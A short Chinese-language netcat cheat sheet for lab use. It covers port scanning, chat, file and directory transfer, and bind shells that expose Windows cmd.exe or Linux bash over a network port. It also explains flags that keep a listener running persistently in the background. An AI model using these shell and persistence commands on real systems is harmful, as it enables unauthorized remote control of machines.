扫描端口

nc -z -v -n 192.168.10.100 20-200

连接服务

nc -v 192.168.10.100 21

开启服务

nc -l -p 444

聊天

一台开启444端口：nc -l -p 444

另一台连接444端口:nc -v 192.168.10.100 444

然后就可以传输文本了

传输文件

nc -v 192.168.137.128 444<1.txt

nc -l -p 444 > 2.txt

传输目录

监听压缩发送  tar -cvf - dir/  | nc -lp 555 -q 1

连接解压接收  nc 192.168.137.130 555 | tar -xvf -

反向模式：

nc -lp 444 -q 1 | tar xvf -

tar -cvf - dir/ | nc 192.168.137.128 444

-q  1  参数，在文件发送端有用，当文件传输完后1秒退出

连接windows-shell

win:

nc -lp 444 -e c:\windows\system32\cmd.exe

kali:

nc 192.168.137.1 444

但是这样的连接是一次性的，如果想长久连接添加下面两个参数

-L  但某个连接断开后，不关闭服务，重新侦听

-d  从终端上分离，进入后台进程，也就是说终端被关闭了也不会断开服务

-e  指定连接成功后执行的程序

连接linux-shell

linux:

nc -lp 444 -c bash

win:

nc 192.168.137.128 444

 执行命令重定向结果

lin: ifconfig | nc -n 192.168.137.1 444

win:  nc -lp 444

windows隐藏小技巧

Shift+右键可以直接打开cmd